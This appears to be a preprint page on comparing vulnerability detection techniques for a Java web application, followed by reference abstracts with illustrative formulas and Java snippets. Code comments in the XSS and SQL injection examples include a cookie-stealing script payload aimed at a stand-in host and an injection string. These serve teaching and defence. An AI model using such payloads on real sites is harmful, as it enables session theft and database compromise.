Preprint

Do I really need all this work to find vulnerabilities? An empirical case study comparing vulnerability detection techniques on a Java application

Abstract

CONTEXT: Applying vulnerability detection techniques is one of many tasks using the limited resources of a software project. OBJECTIVE: The goal of this research is to assist managers and other decision-makers in making informed choices about the use of software vulnerability detection techniques through an empirical study of the efficiency and effectiveness of four techniques on a Java-based web application. METHOD: We apply four different categories of vulnerability detection techniques – systematic manual penetration testing (SMPT), exploratory manual penetration testing (EMPT), dynamic application security testing (DAST), and static application security testing (SAST) – to an open-source medical records system. RESULTS: We found the most vulnerabilities using SAST. However, EMPT found more severe vulnerabilities. With each technique, we found unique vulnerabilities not found using the other techniques. The efficiency of manual techniques (EMPT, SMPT) was comparable to or better than the efficiency of automated techniques (DAST, SAST) in terms of Vulnerabilities per Hour (VpH). CONCLUSIONS: The vulnerability detection technique practitioners should select may vary based on the goals and available resources of the project. If the goal of an organization is to find "all" vulnerabilities in a project, they need to use as many techniques as their resources allow.
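For concreteness, the efficiency metric can be written as follows; this rendering is ours, and the paper's exact accounting of hours may differ:

```latex
% Vulnerabilities per Hour for a technique t (our rendering of the metric
% named in the abstract; the paper may operationalize the hours differently).
\[
  \mathrm{VpH}(t) = \frac{V_t}{H_t}
\]
% where $V_t$ is the number of vulnerabilities found with technique $t$ and
% $H_t$ is the person-hours spent applying it.
```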

References

Conference Paper
Organizational security teams have begun to specialize, and as a result, the existence of red, blue, and purple teams has been used as a signal for an organization's security maturity. There is also now a rise in the use of third-party contractors who offer services such as incident response or penetration testing. Additionally, bug bounty programs are not only gaining popularity, but also are perceived as cost-effective replacements for internal security teams. Due to the many strategies to secure organizations, determining which strategy is best suited for a given situation may be a difficult task. To understand how these varying strategies are applied in practice and to understand non-technical challenges faced by professionals, we conducted 53 interviews with security practitioners in technical and managerial roles tasked with vulnerability discovery or management. We found that organizations often struggle with vulnerability remediation and that vulnerability discovery efforts are hindered by significant trust, communication, funding, and staffing issues. Based on our findings, we offer recommendations for how organizations can better apply these strategies.
Article
Web vulnerability scanners (WVSs) are tools that can detect security vulnerabilities in web services. Although both commercial and open-source WVSs exist, their vulnerability detection capability and performance vary. In this article, we report on a comparative study to determine the vulnerability detection capabilities of eight WVSs (both open-source and commercial) using two vulnerable web applications: WebGoat and Damn Vulnerable Web Application. The eight WVSs studied were: Acunetix; HP WebInspect; IBM AppScan; OWASP ZAP; Skipfish; Arachni; Vega; and IronWASP. The performance was evaluated using multiple evaluation metrics: precision; recall; Youden index; OWASP web benchmark evaluation; and the web application security scanner evaluation criteria. The experimental results show that, while the commercial scanners are effective in detecting security vulnerabilities, some open-source scanners (such as ZAP and Skipfish) can also be effective. In summary, this study recommends improving the vulnerability detection capabilities of both the open-source and commercial scanners to enhance code coverage and the detection rate, and to reduce the number of false positives.
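For reference, the three statistical metrics named above have standard definitions; with true/false positives and negatives (TP, FP, TN, FN) counted against each application's known vulnerabilities:

```latex
\[
  \mathrm{precision} = \frac{TP}{TP + FP}, \qquad
  \mathrm{recall} = \frac{TP}{TP + FN}, \qquad
  J = \frac{TP}{TP + FN} + \frac{TN}{TN + FP} - 1
\]
% Youden's J rewards a scanner that is simultaneously sensitive (high recall)
% and specific (few false alarms): J = 1 is perfect, J = 0 is no better than chance.
```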
Article
As web applications become more prevalent, web security becomes more and more important. Cross-site scripting (XSS) is a common type of injection vulnerability in web applications. The exploitation of XSS vulnerabilities can hijack users' sessions; modify, read, and delete business data of web applications; place malicious code in web applications; and use victims' browsers to attack other targeted servers. This paper discusses the classification of XSS and designs a demo website to demonstrate the attack processes of common XSS exploitation scenarios. The paper also compares and analyzes recent research results on XSS detection, dividing them into three categories by mechanism: static analysis methods, dynamic analysis methods, and hybrid analysis methods. The paper classifies 30 detection methods into these three categories, makes an overall comparative analysis among them, and lists their strengths, weaknesses, and detected XSS vulnerability types. Finally, the paper explores some ways to prevent XSS vulnerabilities from being exploited.
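As a concrete illustration of the reflected-XSS scenario described above (a minimal sketch, not code from the paper's demo website), a vulnerable Java servlet and its conventional fix might look like this:

```java
// Hypothetical servlet illustrating reflected XSS; the class and parameter
// names are ours, invented for illustration.
import java.io.IOException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class SearchServlet extends HttpServlet {
    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp)
            throws IOException {
        String q = req.getParameter("q");
        resp.setContentType("text/html");
        // Vulnerable: attacker-controlled input is echoed into the HTML response, so
        // q = "<script>new Image().src='//evil.example/?c='+document.cookie</script>"
        // runs in the victim's browser (session hijacking, as described above).
        resp.getWriter().println("<p>Results for: " + q + "</p>");
        // Conventional fix: HTML-encode untrusted output before writing it,
        // e.g. with the OWASP Java Encoder: org.owasp.encoder.Encode.forHtml(q).
    }
}
```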
Conference Paper
Static analysis tool alerts can help developers detect potential defects in the code early in the development cycle. However, developers are not always able to respond to the alerts with their preferred action and may turn away from using the tool. In this paper, we qualitatively analyze 280 Stack Overflow (SO) questions regarding static analysis tool alerts to identify the challenges developers face in understanding and responding to these alerts. We find that the most prevalent question on SO is how to ignore and filter alerts, followed by validation of false positives. Our findings confirm prior researchers' findings related to notification communication theory as 44.6% of the SO questions that we analyzed indicate developers face communication challenges.
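For example (our illustration, not taken from the study), SpotBugs, the successor to FindBugs, lets a developer silence a single triaged alert with an annotation and a recorded justification rather than abandoning the tool:

```java
// Hypothetical example of suppressing one triaged false positive in SpotBugs;
// the DAO class and whitelist rationale are invented for illustration.
import edu.umd.cs.findbugs.annotations.SuppressFBWarnings;

public class ReportDao {
    @SuppressFBWarnings(
        value = "SQL_PREPARED_STATEMENT_GENERATED_FROM_NONCONSTANT_STRING",
        justification = "Table name comes from a fixed internal whitelist, never from user input")
    public void countRows(java.sql.Connection conn, String table) throws java.sql.SQLException {
        try (java.sql.PreparedStatement ps =
                 conn.prepareStatement("SELECT COUNT(*) FROM " + table)) {
            ps.executeQuery();
        }
    }
}
```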
Conference Paper
Identifying security vulnerabilities in software is a critical task that requires significant human effort. Currently, vulnerability discovery is often the responsibility of software testers before release and white-hat hackers (often within bug bounty programs) afterward. This arrangement can be ad-hoc and far from ideal; for example, if testers could identify more vulnerabilities, software would be more secure at release time. Thus far, however, the processes used by each group — and how they compare to and interact with each other — have not been well studied. This paper takes a first step toward better understanding, and eventually improving, this ecosystem: we report on a semi-structured interview study (n=25) with both testers and hackers, focusing on how each group finds vulnerabilities, how they develop their skills, and the challenges they face. The results suggest that hackers and testers follow similar processes, but get different results due largely to differing experiences and therefore different underlying knowledge of security concepts. Based on these results, we provide recommendations to support improved security training for testers, better communication between hackers and developers, and smarter bug bounty policies to motivate hacker participation.
Conference Paper
Security testing can broadly be described as (1) the testing of security requirements that concern confidentiality, integrity, availability, authentication, authorization, and non-repudiation, and (2) the testing of the software to validate how much it can withstand an attack. Agile testing involves immediately integrating changes into the main system, continuously testing all changes, and updating test cases to be able to run a regression test at any time to verify that changes have not broken existing functionality. Software companies today face the challenge of applying security testing systematically in their processes. There is a lack of guidelines in practice as well as empirical studies in real-world projects on agile security testing; industry in general needs a more systematic approach to security. The findings of this research are not surprising, but at the same time are alarming. The lack of knowledge on security by agile teams in general, the large dependency on incidental pen-testers, and the ignorance of static testing for security are indicators that security testing is highly under-addressed and that more effort should be directed to security testing in agile teams.
Article
Context: There have been many changes in statistical theory in the past 30 years, including increased evidence that non-robust methods may fail to detect important results. The statistical advice available to software engineering researchers needs to be updated to address these issues. Objective: This paper aims both to explain the new results in the area of robust analysis methods and to provide a large-scale worked example of the new methods. Method: We summarise the results of analyses of the Type 1 error efficiency and power of standard parametric and non-parametric statistical tests when applied to non-normal data sets. We identify parametric and non-parametric methods that are robust to non-normality. We present an analysis of a large-scale software engineering experiment to illustrate their use. Results: We illustrate the use of kernel density plots, and parametric and non-parametric methods using four different software engineering data sets. We explain why the methods are necessary and the rationale for selecting a specific analysis. Conclusion: We suggest using kernel density plots rather than box plots to visualise data distributions. For parametric analysis, we recommend trimmed means, which can support reliable tests of the differences between the central location of two or more samples. When the distribution of the data differs among groups, or we have ordinal scale data, we recommend non-parametric methods such as Cliff's δ or a robust rank-based ANOVA-like method.
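For reference, Cliff's δ for two samples x₁,…,x_m and y₁,…,y_n has the standard definition:

```latex
\[
  \delta = \frac{\#\{(i,j) : x_i > y_j\} - \#\{(i,j) : x_i < y_j\}}{mn}
\]
% delta ranges from -1 to 1; 0 means the two groups are stochastically equal,
% while |delta| near 1 means one group's values almost always exceed the other's.
```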
Conference Paper
Security tools can help developers answer questions about potential vulnerabilities in their code. A better understanding of the types of questions asked by developers may help toolsmiths design more effective tools. In this paper, we describe how we collected and categorized these questions by conducting an exploratory study with novice and experienced software developers. We equipped them with Find Security Bugs, a security-oriented static analysis tool, and observed their interactions with security vulnerabilities in an open-source system that they had previously contributed to. We found that they asked questions not only about security vulnerabilities, associated attacks, and fixes, but also questions about the software itself, the social ecosystem that built the software, and related resources and tools. For example, when participants asked questions about the source of tainted data, their tools forced them to make imperfect tradeoffs between systematic and ad hoc program navigation strategies.
Article
There is little or no information available on what actually happens when a software vulnerability is detected. We performed an empirical study on reporters of the three most prominent security vulnerabilities: buffer overflow, SQL injection, and cross-site scripting vulnerabilities. The goal was to understand the methods and tools used during the discovery and whether the community of developers exploring one security vulnerability differs—in their approach—from another community of developers exploring a different vulnerability. The reporters were featured in the SecurityFocus repository for twelve-month periods for each vulnerability. We collected 127 responses. We found that the communities differ based on the security vulnerability they target; but within a specific community, reporters follow similar approaches. We also found a serious problem in the vulnerability reporting process that is common to all communities. Most reporters, especially the experienced ones, favor full disclosure and do not collaborate with the vendors of vulnerable software. They think that the public disclosure, sometimes supported by a detailed exploit, will put pressure on vendors to fix the vulnerabilities. But, in practice, the vulnerabilities not reported to vendors are less likely to be fixed. Ours is the first study on vulnerability repositories that targets the reporters of the most common security vulnerabilities, thus concentrating on the people involved in the process; previous works have overlooked this rich information source. The results are valuable for beginners exploring how to detect and report security vulnerabilities and for tool vendors and researchers exploring how to automate and fix the process.
Article
The importance of the normal distribution is undeniable since it is an underlying assumption of many statistical procedures such as t-tests, linear regression analysis, discriminant analysis, and Analysis of Variance (ANOVA). When the normality assumption is violated, interpretation and inferences may not be reliable or valid. The three common procedures for assessing whether a random sample of independent observations of size n comes from a population with a normal distribution are: graphical methods (histograms, boxplots, Q-Q plots), numerical methods (skewness and kurtosis indices), and formal normality tests. This paper compares the power of four formal tests of normality: the Shapiro-Wilk (SW) test, Kolmogorov-Smirnov (KS) test, Lilliefors (LF) test, and Anderson-Darling (AD) test. Power comparisons of these four tests were obtained via Monte Carlo simulation of sample data generated from alternative distributions that follow symmetric and asymmetric distributions. Ten thousand samples of various sizes were generated from each of the given alternative symmetric and asymmetric distributions. The power of each test was then obtained by comparing the test of normality statistics with the respective critical values. Results show that the Shapiro-Wilk test is the most powerful normality test, followed by the Anderson-Darling test, Lilliefors test, and Kolmogorov-Smirnov test. However, the power of all four tests is still low for small sample sizes.
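The power estimate behind these comparisons is the usual Monte Carlo one; in the study's setup (10,000 samples per condition) it amounts to:

```latex
\[
  \widehat{\mathrm{power}} = \frac{1}{10000} \sum_{i=1}^{10000}
    \mathbf{1}\{\text{the test rejects normality for sample } i \text{ at level } \alpha\}
\]
% i.e., the fraction of samples drawn from the non-normal alternative whose
% test statistic falls beyond the corresponding critical value.
```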
Conference Paper
Context: Exploratory Testing has experienced a rise in popularity in the industry with the emergence of agile development practices, yet it remains unclear in which domains and how it is used in practice. Objective: To study how software engineers understand and apply the principles of exploratory testing, as well as the specific advantages and difficulties they experience. Method: We conducted an online survey in the period June to August 2013 among Estonian and Finnish software developers and testers. Results: Our main findings are that the majority of testers, developers, and test managers using ET (1) apply ET to usability-critical, performance-critical, security-critical and safety-critical software to a high degree; (2) use ET very flexibly in all types of test levels, activities, and phases; (3) perceive ET as an approach that supports creativity during testing and that is effective and efficient; and (4) find that ET is not easy to use and has little tool support. Conclusion: The high degree of application of ET in critical domains is particularly interesting and indicates a need for future research to obtain a better understanding of the effects of ET in these domains. In addition, our findings suggest that more support (guidance and tools) should be given to ET users.
Article
Manual software testing is a widely practiced verification and validation method that is unlikely to fade away despite the advances in test automation. In the domain of manual testing, many practitioners advocate exploratory testing (ET), i.e., creative, experience-based testing without predesigned test cases, and they claim that it is more efficient than testing with detailed test cases. This paper reports a replicated experiment comparing effectiveness, efficiency, and perceived differences between ET and test-case-based testing (TCT) using 51 students as subjects, who performed manual functional testing on the jEdit text editor. Our results confirm the findings of the original study: 1) there is no difference in the defect detection effectiveness between ET and TCT, 2) ET is more efficient by requiring less design effort, and 3) TCT produces more false-positive defect reports than ET. Based on the small differences in the experimental design, we also put forward a hypothesis that the effectiveness of the TCT approach would suffer more than ET from time pressure. We also found that both approaches had distinctive issues: in TCT, the problems were related to correct abstraction levels of test cases, and the problems in ET were related to test design and logging of the test execution and results. Finally, we recognize that TCT has other benefits over ET in managing and controlling testing in large organizations.
Article
We present a field study on how testers use knowledge while performing exploratory software testing (ET) in industrial settings. We video recorded 12 testing sessions in four industrial organizations, having our subjects think aloud while performing their usual functional testing work. Using applied grounded theory, we analyzed how the subjects performed tests and what type of knowledge they utilized. We discuss how testers recognize failures based on their personal knowledge without detailed test case descriptions. The knowledge is classified under the categories of domain knowledge, system knowledge, and general software engineering knowledge. We found that testers applied their knowledge either as a test oracle to determine whether a result was correct or not, or for test design, to guide them in selecting objects for test and designing tests. Interestingly, a large number of failures, windfall failures, were found outside the actual focus areas of testing as a result of exploratory investigation. We conclude that the way exploratory testers apply their knowledge for test design and failure recognition differs clearly from the test-case-based paradigm and is one of the explanatory factors of the effectiveness of the exploratory testing approach.
Conference Paper
Vulnerability detection tools are frequently considered a silver bullet for detecting vulnerabilities in web services. However, research shows that the effectiveness of most of those tools is very low and that using the wrong tool may lead to the deployment of services with undetected vulnerabilities. In this paper we propose a benchmarking approach to assess and compare the effectiveness of vulnerability detection tools in web services environments. This approach was used to define a concrete benchmark for SQL injection vulnerability detection tools. This benchmark is demonstrated by a real example of benchmarking several widely used tools, including four penetration testers, three static code analyzers, and one anomaly detector. Results show that the benchmark accurately portrays the effectiveness of vulnerability detection tools and suggest that the proposed approach can be applied in the field.
Conference Paper
Web services are becoming business-critical components that must provide a non-vulnerable interface to the client applications. However, previous research and practice show that many web services are deployed with critical vulnerabilities. SQL injection vulnerabilities are particularly relevant, as web services frequently access a relational database using SQL commands. Penetration testing and static code analysis are two well-known techniques often used for the detection of security vulnerabilities. In this work we compare how effective these two techniques are at the detection of SQL injection vulnerabilities in web services code. To understand the strengths and limitations of these techniques, we used several commercial and open source tools to detect vulnerabilities in a set of vulnerable services. Results suggest that, in general, static code analyzers are able to detect more SQL injection vulnerabilities than penetration testing tools. Another key observation is that tools implementing the same detection approach frequently detect different vulnerabilities. Finally, many tools provide low coverage and a high false-positive rate, making them a bad option for programmers.
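To make the target concrete, the kind of code both tool families inspect looks like the following (a generic JDBC sketch; the class and query are ours, not code from the benchmarked services):

```java
// Hypothetical service-layer fragment showing the vulnerability and its fix.
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

public class PatientLookup {
    // Vulnerable: user input is concatenated into the SQL command, so
    // name = "x' OR '1'='1" makes the WHERE clause always true (SQL injection).
    ResultSet findUnsafe(Connection c, String name) throws SQLException {
        Statement s = c.createStatement();
        return s.executeQuery("SELECT * FROM patients WHERE name = '" + name + "'");
    }

    // Fixed: a parameterized query keeps the input out of the SQL grammar.
    ResultSet findSafe(Connection c, String name) throws SQLException {
        PreparedStatement ps = c.prepareStatement("SELECT * FROM patients WHERE name = ?");
        ps.setString(1, name);
        return ps.executeQuery();
    }
}
```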
Conference Paper
Replications play an important role in verifying empirical results. In this paper, we discuss our experiences performing a literal replication of a human subjects experiment that examined the relationship between a simple test for consistent use of mental models and success in an introductory programming course. We encountered many difficulties in achieving comparability with the original experiment, due to a series of apparently minor differences in context. Based on this experience, we discuss the relative merits of replication, and suggest that, for some human subjects studies, literal replication may not be the most effective strategy for validating the results of previous studies.
Conference Paper
Black-box web vulnerability scanners are a class of tools that can be used to identify security issues in web applications. These tools are often marketed as "point-and-click pentesting" tools that automatically evaluate the security of web applications with little or no human support. These tools access a web application in the same way users do, and, therefore, have the advantage of being independent of the particular technology used to implement the web application. However, these tools need to be able to access and test the application's various components, which are often hidden behind forms, JavaScript-generated links, and Flash applications. This paper presents an evaluation of eleven black-box web vulnerability scanners, both commercial and open-source. The evaluation combines different types of vulnerabilities with different challenges to the crawling capabilities of the tools. These tests are integrated in a realistic web application. The results of the evaluation show that crawling is a task that is as critical and challenging to the overall ability to detect vulnerabilities as the vulnerability detection techniques themselves, and that many classes of vulnerabilities are completely overlooked by these tools, and thus research is required to improve the automated detection of these flaws.
Conference Paper
The serious bugs and security vulnerabilities facilitated by C/C++'s lack of bounds checking are well known, yet C and C++ remain in widespread use. Unfortunately, C's arbitrary pointer arithmetic, conflation of pointers and arrays, and programmer-visible memory layout make retrofitting C/C++ with spatial safety guarantees extremely challenging. Existing approaches suffer from incompleteness, have high runtime overhead, or require non-trivial changes to the C source code. Thus far, these deficiencies have prevented widespread adoption of such techniques. This paper proposes SoftBound, a compile-time transformation for enforcing spatial safety of C. Inspired by HardBound, a previously proposed hardware-assisted approach, SoftBound similarly records base and bound information for every pointer as disjoint metadata. This decoupling enables SoftBound to provide spatial safety without requiring changes to C source code. Unlike HardBound, SoftBound is a software-only approach and performs metadata manipulation only when loading or storing pointer values. A formal proof shows that this is sufficient to provide spatial safety even in the presence of arbitrary casts. SoftBound's full checking mode provides complete spatial violation detection with 67% runtime overhead on average. To further reduce overheads, SoftBound has a store-only checking mode that successfully detects all the security vulnerabilities in a test suite at the cost of only 22% runtime overhead on average.
Article
Various statistical methods, developed after 1970, offer the opportunity to substantially improve upon the power and accuracy of the conventional t test and analysis of variance methods for a wide range of commonly occurring situations. The authors briefly review some of the more fundamental problems with conventional methods based on means; provide some indication of why recent advances, based on robust measures of location (or central tendency), have practical value; and describe why modern investigations dealing with nonnormality find practical problems when comparing means, in contrast to earlier studies. Some suggestions are made about how to proceed when using modern methods.
Conference Paper
Web applications are typically developed with hard time constraints and are often deployed with security vulnerabilities. Automatic web vulnerability scanners can help to locate these vulnerabilities and are popular tools among developers of web applications. Their purpose is to stress the application from the attacker's point of view by issuing a huge number of interactions with it. Two of the most widely spread and dangerous vulnerabilities in web applications are SQL injection and cross-site scripting (XSS), because of the damage they may cause to the victim business. Trusting the results of web vulnerability scanning tools is of utmost importance. Without a clear idea of the coverage and false-positive rate of these tools, it is difficult to judge the relevance of the results they provide. Furthermore, it is difficult, if not impossible, to compare key figures of merit of web vulnerability scanners. In this paper we propose a method to evaluate and benchmark automatic web vulnerability scanners using software fault injection techniques. The most common types of software faults are injected in the web application code, which is then checked by the scanners. The results are compared by analyzing the coverage of vulnerability detection and false positives. Three leading commercial scanning tools are evaluated and the results show that in general the coverage is low and the percentage of false positives is very high.
Conference Paper
Buffer overflows have been the most common form of security vulnerability for the last ten years. Moreover, buffer overflow vulnerabilities dominate the area of remote network penetration vulnerabilities, where an anonymous Internet user seeks to gain partial or total control of a host. If buffer overflow vulnerabilities could be effectively eliminated, a very large portion of the most serious security threats would also be eliminated. We survey the various types of buffer overflow vulnerabilities and attacks, and the various defensive measures that mitigate them, including our own StackGuard method. We then consider which combinations of techniques can eliminate the problem of buffer overflow vulnerabilities while preserving the functionality and performance of existing systems.
Article
Context: Cognitive load in software engineering refers to the mental effort users spend while reading software artifacts. The cognitive load can vary according to tasks and across developers. Researchers have measured developers' cognitive load for different purposes, such as understanding its impact on productivity and software quality. Thus, researchers and practitioners can use cognitive load measures for solving many aspects of software engineering problems. Problem: However, the lack of a classification of the dimensions of cognitive load measures in software engineering makes it difficult for researchers and practitioners to identify research trends, advance scientific knowledge, or apply it in software projects. Objective: This article aims to provide a classification of different aspects of cognitive load measures in software engineering and identify challenges for further research from the classified works. Method: We conducted a Systematic Mapping Study (SMS), which started with 4,175 articles gathered from 11 search engines and then narrowed down to 63 primary studies. Results: Our main findings are: (1) 62% (39/63) focused on applying a combination of sensors; (2) 81% (51/63) of the selected works were validation studies; (3) 83% (52/63) analyzed the cognitive load while developers performed programming tasks. Moreover, the answers to the research questions formed a classification scheme. Conclusion: Despite the significant number of studies on cognitive load in software engineering produced by academia, many challenges remain for academia and practitioners to measure cognitive load effectively. To that end, this study provides directions for future studies on cognitive load in the field of software engineering for academia and practitioners.
Article
Buffer overflow (BO) is a well-known and widely exploited security vulnerability. Despite the extensive body of research, BO is still a threat menacing security-critical applications. The authors present a comprehensive systematic review of techniques intended to detect BO vulnerabilities before releasing software to production. They found that most of the studies address several vulnerabilities or memory errors and are not specific to BO detection. The authors organized them into categories: program analysis, testing, computational intelligence, symbolic execution, models, and code inspection. Program analysis, testing, and code inspection techniques are available for use by the practitioner. However, program analysis adoption is hindered by the high number of false alarms; testing is broadly used but in an ad hoc manner; and code inspection can be used in practice provided it is added as a task of the software development process. New techniques combining object code analysis with techniques from different categories seem a promising research avenue towards practical BO detection.
Conference Paper
Fuzz testing has enjoyed great success at discovering security critical bugs in real software. Recently, researchers have devoted significant effort to devising new fuzzing techniques, strategies, and algorithms. Such new ideas are primarily evaluated experimentally so an important question is: What experimental setup is needed to produce trustworthy results? We surveyed the recent research literature and assessed the experimental evaluations carried out by 32 fuzzing papers. We found problems in every evaluation we considered. We then performed our own extensive experimental evaluation using an existing fuzzer. Our results showed that the general problems we found in existing experimental evaluations can indeed translate to actual wrong or misleading assessments. We conclude with some guidelines that we hope will help improve experimental evaluations of fuzz testing algorithms, making reported results more robust.
Conference Paper
Construct validity is essentially the degree to which our scales, metrics and instruments actually measure the properties they are supposed to measure. Although construct validity is widely considered an important quality criterion for most empirical research, many software engineering studies simply assume that proposed measures are valid and make no attempt to assess construct validity. Researchers may ignore construct validity because evaluating it is intrinsically difficult, or due to a lack of specific guidance for addressing it. In any case, some research inevitably produces erroneous conclusions because of invalid measures. This article therefore attempts to address these problems by explaining the theoretical basis of construct validity, presenting a framework for understanding it, and developing specific guidelines for assessing it. The paper draws on a detailed example involving 15 software metrics, which ostensibly measure the size, coupling and cohesion of Java classes.
Article
Context: Practitioners establish a piece of software's security objectives during the software development process. To support control and assessment, practitioners and researchers seek to measure security risks and mitigations during software development projects. Metrics provide one means for assessing whether software security objectives have been achieved. A catalog of security metrics for the software development life cycle could assist practitioners in choosing appropriate metrics, and researchers in identifying opportunities for refinement of security measurement. Objective: The goal of this research is to support practitioner and researcher use of security measurement in the software life cycle by cataloging security metrics presented in the literature, their validation, and the subjects they measure. Method: We conducted a systematic mapping study, beginning with 4818 papers and narrowing down to 71 papers reporting on 324 unique security metrics. For each metric, we identified the subject being measured, how the metric has been validated, and how the metric is used. We categorized the metrics, and give examples of metrics for each category. Results: In our data, 85% of security metrics have been proposed and evaluated solely by their authors, leaving room for replication and confirmation through field studies. Approximately 60% of the metrics have been empirically evaluated, by their authors or by others. The available metrics are weighted heavily toward the implementation and operations phases, with relatively few metrics for requirements, design, and testing phases of software development. Some artifacts and processes remain unmeasured. Measured by phase, Testing received the least attention, with 1.5% of the metrics. Conclusions: At present, the primary application of security metrics to the software development life cycle in the literature is to study the relationship between properties of source code and reported vulnerabilities. The most-cited and most used metric, vulnerability count, has multiple definitions and operationalizations. We suggest that researchers must check vulnerability count definitions when making comparisons between papers. In addition to refining vulnerability measurement, we see research opportunities for greater attention to metrics for the requirement, design, and testing phases of development. We conjecture from our data that the field of software life cycle security metrics has yet to converge on an accepted set of metrics.
Chapter
The experiment data from the operation is input to the analysis and interpretation. After collecting experimental data in the operation phase, we want to be able to draw conclusions based on this data. To be able to draw valid conclusions, we must interpret the experiment data.
Conference Paper
We perform an empirical study to better understand two well-known vulnerability rewards programs, or VRPs, which software vendors use to encourage community participation in finding and responsibly disclosing software vulnerabilities. The Chrome VRP has cost approximately $580,000 over 3 years and has resulted in 501 bounties paid for the identification of security vulnerabilities. The Firefox VRP has cost approximately $570,000 over the last 3 years and has yielded 190 bounties. 28% of Chrome's patched vulnerabilities appearing in security advisories over this period, and 24% of Firefox's, are the result of VRP contributions. Both programs appear economically efficient, comparing favorably to the cost of hiring full-time security researchers. The Chrome VRP features low expected payouts accompanied by high potential payouts, while the Firefox VRP features fixed payouts. Finding vulnerabilities for VRPs typically does not yield a salary comparable to a full-time job; the common case for recipients of rewards in either program is that they have received only one reward. Firefox has far more critical-severity vulnerabilities than Chrome, which we believe is attributable to an architectural difference between the two browsers.
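Using the totals above, the implied average payouts work out to:

```latex
\[
  \frac{\$580{,}000}{501\ \text{bounties}} \approx \$1{,}158\ \text{per Chrome bounty},
  \qquad
  \frac{\$570{,}000}{190\ \text{bounties}} = \$3{,}000\ \text{per Firefox bounty}
\]
% Both figures sit well below the loaded annual cost of a full-time security
% researcher, which is the sense in which the programs are "economically efficient".
```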
Conference Paper
Suppose you have to assemble a security team, which is tasked with performing the security analysis of your organization's latest applications. After researching how to assess your applications, you find that the most popular techniques (also offered by most security consultancies) are automated static analysis and black box penetration testing. Under time and budget constraints, which technique would you use first? This paper compares these two techniques by means of an exploratory controlled experiment, in which 9 participants analyzed the security of two open source blogging applications. Despite its relatively small size, this study shows that static analysis finds more vulnerabilities, and in a shorter time, than penetration testing.
Conference Paper
Capturing attacker behavior in a security test plan allows the systematic, repeated assessment of a system's defenses against attacks. To address the lack of security experts capable of developing effective black box security test plans, we have empirically developed an initial set of six black box security test patterns. These patterns capture the expertise involved in creating a black box security test plan in the same way that software design patterns capture design expertise. Security test patterns can enable software testers lacking security expertise (in this paper, "novices") to develop a test plan the way experts could. The goal of this paper is to evaluate the ability of novices to effectively generate black box security tests by accessing security expertise contained within security test patterns. We conducted a user study of 47 student novices, who used our six initial patterns to develop black box security test plans for six requirements from a publicly available specification for electronic health records systems. We created an oracle for the security test plan by forming a panel of researchers who manually completed the same task as the novices. We found that novices will generate a similar black box test plan to the oracle when aided by the six black box security test patterns.
Conference Paper
Using static analysis tools for automating code inspections can be beneficial for software engineers. Such tools can make finding bugs, or software defects, faster and cheaper than manual inspections. Despite the benefits of using static analysis tools to find bugs, research suggests that these tools are underused. In this paper, we investigate why developers are not widely using static analysis tools and how current tools could potentially be improved. We conducted interviews with 20 developers and found that although all of our participants felt that use is beneficial, false positives and the way in which the warnings are presented, among other things, are barriers to use. We discuss several implications of these results, such as the need for an interactive mechanism to help developers fix defects.
Article
Although there has long been a consensus that intercoder reliability is crucial to the validity of a content analysis study, the choice among indices has been debated. This study reviewed and empirically tested the most popular intercoder reliability indices, aiming to find the index most robust against prevalence and rater bias, by empirically testing their relationships with response surface methodology through a Monte Carlo experiment. It was found that Maxwell's RE is superior to Krippendorff's α, Scott's π, Cohen's κ, the Ir of Perreault and Leigh, and Gwet's AC1. More nuanced relationships among prevalence, sensitivity, specificity, and the intercoder reliability indices were discovered through response surface plots. Theoretical and practical implications are also discussed in the end.
Article
Context: Security vulnerabilities discovered later in the development cycle are more expensive to fix than those discovered early. Therefore, software developers should strive to discover vulnerabilities as early as possible. Unfortunately, the large size of code bases and lack of developer expertise can make discovering software vulnerabilities difficult. A number of vulnerability discovery techniques are available, each with their own strengths. Objective: The objective of this research is to aid in the selection of vulnerability discovery techniques by comparing the vulnerabilities detected by each and comparing their efficiencies. Method: We conducted three case studies using three electronic health record systems to compare four vulnerability discovery techniques: exploratory manual penetration testing, systematic manual penetration testing, automated penetration testing, and automated static analysis. Results: In our case study, we found empirical evidence that no single technique discovered every type of vulnerability. We discovered that the specific set of vulnerabilities identified by one tool was largely orthogonal to that of other tools. Systematic manual penetration testing found the most design flaws, while automated static analysis found the most implementation bugs. The most efficient discovery technique in terms of vulnerabilities discovered per hour was automated penetration testing. Conclusion: The results show that employing a single technique for vulnerability discovery is insufficient for finding all types of vulnerabilities. Each technique identified only a subset of the vulnerabilities, which, for the most part, were independent of each other. Our results suggest that in order to discover the greatest variety of vulnerability types, at least systematic manual penetration testing and automated static analysis should be performed.
Article
In a previous paper, dealing with the importance of properties of sufficiency in the statistical theory of small samples, attention was mainly confined to the theory of estimation. In the present paper the structure of small sample tests, whether these are related to problems of estimation and fiducial distributions, or are of the nature of tests of goodness of fit, is considered further.
Article
Three different methods for testing all pairwise differences of means, Ȳk − Ȳk′, were contrasted under varying sample size (n) and variance conditions. With unequal n's of six and up, only the Behrens-Fisher statistic provided satisfactory control of both the familywise rate of Type I errors and the Type I error rate on each contrast. Satisfactory control with unequal n's of three and up is dubious even with this statistic.
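The Behrens-Fisher statistic referred to here is the Welch-type contrast, which does not pool the two group variances:

```latex
\[
  t = \frac{\overline{Y}_k - \overline{Y}_{k'}}
           {\sqrt{s_k^2 / n_k + s_{k'}^2 / n_{k'}}}
\]
% with degrees of freedom estimated from the data (Welch-Satterthwaite), so that
% the Type I error rate stays controlled even when variances and n's are unequal.
```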
Article
As a method specifically intended for the study of messages, content analysis is fundamental to mass communication research. Intercoder reliability, more specifically termed intercoder agreement, is a measure of the extent to which independent judges make the same coding decisions in evaluating the characteristics of messages, and is at the heart of this method. Yet there are few standard and accessible guidelines available regarding the appropriate procedures to use to assess and report intercoder reliability, or software tools to calculate it. As a result, it seems likely that there is little consistency in how this critical element of content analysis is assessed and reported in published mass communication studies. Following a review of relevant concepts, indices, and tools, a content analysis of 200 studies utilizing content analysis published in the communication literature between 1994 and 1998 is used to characterize practices in the field. The results demonstrate that mass communication researchers often fail to assess (or at least report) intercoder reliability and often rely on percent agreement, an overly liberal index. Based on the review and these results, concrete guidelines are offered regarding procedures for assessment and reporting of this important aspect of content analysis.
Conference Paper
